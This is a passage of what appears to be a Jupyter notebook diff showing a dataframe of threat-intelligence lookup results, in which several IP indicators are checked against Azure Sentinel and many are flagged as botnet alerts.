<td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '874BD11D0EBF97F31A3ACC1E5A28B3DF637D4817BFBAAC59C25350DEC7C78185', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>38</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '7D0F24BEFB1FDFCE86BBE54EB05BAF62FAB93E5C0175E86EB6C5BF3F7E19AD23', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>39</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'D4EEBDC99B631C24A1445A428EB0CA4AC70809C2382521B12270237862FDFAC6', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>40</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'EA6FB2555F18DF5705C116F2BFFFF6F0AC23FE79CC1F70690CE696B15758F961', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>41</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '50CBE99DC38594E814D47C2FC3E065E434297F92927C5642706DDEDEF9100A12', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>42</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '87B84EEB12E45B0AC046178C4DF3BE304534E4404891AB3B670AB337CBDC6026', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>43</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '12F46CB0B858952D8E9ABC29803373104673E7AD463AFA24C603B03CD8C14953', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>44</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '4C007C39F6FEA5B88E1C456CB46929EAD4283B475689957EFF01C01395CE56A0', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>45</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'DDA218AD2568287384B6DD205ECA680D9CAFD5AE6B65B6821552AE11E12189D9', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>46</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'F3DB1ED9EF6CC0C468A309198BA2526152F52D87DB4D56FA56AB43B615149186', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>47</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '2E36BE6DCEACAF7491EC274718845AA84A8AE2EAE025F16DFC87B0D2DEA040DD', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>48</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '72AD9E8122E8CAA56BF8EB0642DAAE3DFCF8C869868623EBD7B9BA43E630062A', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>49</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '9C3E69D4268C0BF3A77C166C0F05BFF8D09B007B75D01517C7A76EBD1334F22A', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>50</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'C735591AC4BB071A7FF91C7B6DFB716CB443F323B199C1E2D98E572D1E405665', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>51</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '33C315E5D5D7C9466CB1F69146AD433928FF973890E2D3BDAF24C4A35A28F8AE', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>52</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '1238F3DBC455768842E6EB9D6601C4C98FDE6A390BBC97B78BE7240F33D5F2D9', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>53</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '334D78E4F5D02FD26CF6B0A0BCFEC0272006B94BDB2622F65DCD724787CBBDC7', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>54</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '7A9D9126C9B0F56B76B874E5C36ED807320A91E5A566E717F30C6022E8B77644', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>55</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'C1D879AB9AF519E159684A8F592D5F8A035E7333A78BD612204ED0F1E1AE9DF4', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>56</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '999F73C902C15F983A702972C30F23D1AD7DEE102BC82C4259AEAF4BB2FDA42A', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>57</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'A973BDB744EF6FC429B19E346C2A8B5EB42DBC292EB37C0BBE4F2CCED98F5F9E', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>58</th>\n      <td>146.56.231.70</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '385F55DABB06B0B7C850AB889E516E2442A1ABF7268C6408B3F136F9DF402010', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>59</th>\n      <td>146.56.231.70</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '70DD90016151A370513F852A93B5FCE681D9E01C200860BA6F12A50FABC5A702', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>60</th>\n      <td>146.56.231.70</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '6422C91AB690A6BDF52A937BF1E03A4F802546D5D5EACA011157A98DB20F590C', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n  </tbody>\n</table>\n</div>",
+      "text/plain": "              Ioc IocType QuerySubtype  \\\n0         1.2.3.4    ipv4         None   \n1     51.75.29.61    ipv4         None   \n2         1.2.3.5    ipv4         None   \n3   109.236.89.61    ipv4         None   \n4   109.236.89.61    ipv4         None   \n5   109.236.89.61    ipv4         None   \n6   109.236.89.61    ipv4         None   \n7   109.236.89.61    ipv4         None   \n8   109.236.89.61    ipv4         None   \n9   109.236.89.61    ipv4         None   \n10  109.236.89.61    ipv4         None   \n11  109.236.89.61    ipv4         None   \n12  109.236.89.61    ipv4         None   \n13  109.236.89.61    ipv4         None   \n14  109.236.89.61    ipv4         None   \n15  109.236.89.61    ipv4         None   \n16  109.236.89.61    ipv4         None   \n17  109.236.89.61    ipv4         None   \n18  109.236.89.61    ipv4         None   \n19  109.236.89.61    ipv4         None   \n20  109.236.89.61    ipv4         None   \n21  109.236.89.61    ipv4         None   \n22  109.236.89.61    ipv4         None   \n23  109.236.89.61    ipv4         None   \n24  109.236.89.61    ipv4         None   \n25  109.236.89.61    ipv4         None   \n26  109.236.89.61    ipv4         None   \n27  109.236.89.61    ipv4         None   \n28  109.236.89.61    ipv4         None   \n29  109.236.89.61    ipv4         None   \n30  109.236.89.61    ipv4         None   \n31  109.236.89.61    ipv4         None   \n32  109.236.89.61    ipv4         None   \n33  109.236.89.61    ipv4         None   \n34  109.236.89.61    ipv4         None   \n35  109.236.89.61    ipv4         None   \n36  109.236.89.61    ipv4         None   \n37  109.236.89.61    ipv4         None   \n38  109.236.89.61    ipv4         None   \n39  109.236.89.61    ipv4         None   \n40  109.236.89.61    ipv4         None   \n41  109.236.89.61    ipv4         None   \n42  109.236.89.61    ipv4         None   \n43  109.236.89.61    ipv4         None   \n44  109.236.89.61    ipv4         None   \n45  109.236.89.61    ipv4         None   \n46  109.236.89.61    ipv4         None   \n47  109.236.89.61    ipv4         None   \n48  109.236.89.61    ipv4         None   \n49  109.236.89.61    ipv4         None   \n50  109.236.89.61    ipv4         None   \n51  109.236.89.61    ipv4         None   \n52  109.236.89.61    ipv4         None   \n53  109.236.89.61    ipv4         None   \n54  109.236.89.61    ipv4         None   \n55  109.236.89.61    ipv4         None   \n56  109.236.89.61    ipv4         None   \n57  109.236.89.61    ipv4         None   \n58  146.56.231.70    ipv4         None   \n59  146.56.231.70    ipv4         None   \n60  146.56.231.70    ipv4         None   \n\n                                                                                              Reference  \\\n0    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n1    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n2    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n3    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n4    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n5    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n6    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n7    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n8    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n9    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n10   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n11   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n12   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n13   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n14   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n15   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n16   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n17   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n18   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n19   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n20   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n21   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n22   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n23   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n24   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n25   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n26   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n27   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n28   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n29   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n30   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n31   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n32   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n33   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n34   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n35   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n36   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n37   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n38   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n39   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n40   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n41   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n42   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n43   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n44   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n45   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n46   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n47   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n48   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n49   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n50   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n51   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n52   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n53   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n54   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n55   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n56   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n57   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n58   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n59   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n60   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:24:18.972814Z) | w...   \n\n    Result  Status  Severity  \\\n0    False     0.0       0.0   \n1    False     0.0       0.0   \n2    False     0.0       0.0   \n3     True     0.0       2.0   \n4     True     0.0       2.0   \n5     True     0.0       2.0   \n6     True     0.0       2.0   \n7     True     0.0       2.0   \n8     True     0.0       2.0   \n9     True     0.0       2.0   \n10    True     0.0       2.0   \n11    True     0.0       2.0   \n12    True     0.0       2.0   \n13    True     0.0       2.0   \n14    True     0.0       2.0   \n15    True     0.0       2.0   \n16    True     0.0       2.0   \n17    True     0.0       2.0   \n18    True     0.0       2.0   \n19    True     0.0       2.0   \n20    True     0.0       2.0   \n21    True     0.0       2.0   \n22    True     0.0       2.0   \n23    True     0.0       2.0   \n24    True     0.0       2.0   \n25    True     0.0       2.0   \n26    True     0.0       2.0   \n27    True     0.0       2.0   \n28    True     0.0       2.0   \n29    True     0.0       2.0   \n30    True     0.0       2.0   \n31    True     0.0       2.0   \n32    True     0.0       2.0   \n33    True     0.0       2.0   \n34    True     0.0       2.0   \n35    True     0.0       2.0   \n36    True     0.0       2.0   \n37    True     0.0       2.0   \n38    True     0.0       2.0   \n39    True     0.0       2.0   \n40    True     0.0       2.0   \n41    True     0.0       2.0   \n42    True     0.0       2.0   \n43    True     0.0       2.0   \n44    True     0.0       2.0   \n45    True     0.0       2.0   \n46    True     0.0       2.0   \n47    True     0.0       2.0   \n48    True     0.0       2.0   \n49    True     0.0       2.0   \n50    True     0.0       2.0   \n51    True     0.0       2.0   \n52    True     0.0       2.0   \n53    True     0.0       2.0   \n54    True     0.0       2.0   \n55    True     0.0       2.0   \n56    True     0.0       2.0   \n57    True     0.0       2.0   \n58    True     0.0       2.0   \n59    True     0.0       2.0   \n60    True     0.0       2.0   \n\n                                                                                                Details  \\\n0                                                                                            Not found.   \n1                                                                                            Not found.   \n2                                                                                            Not found.   \n3   {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n4   {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n5   {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n6   {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n7   {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n8   {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n9   {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n10  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n11  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n12  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n13  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n14  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n15  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n16  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n17  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n18  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n19  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n20  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n21  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n22  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n23  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n24  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n25  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n26  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n27  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n28  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n29  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n30  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n31  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n32  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n33  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n34  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n35  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n36  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n37  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n38  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n39  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n40  {'Action': 'alert', 'ThreatType': 'Botnet', 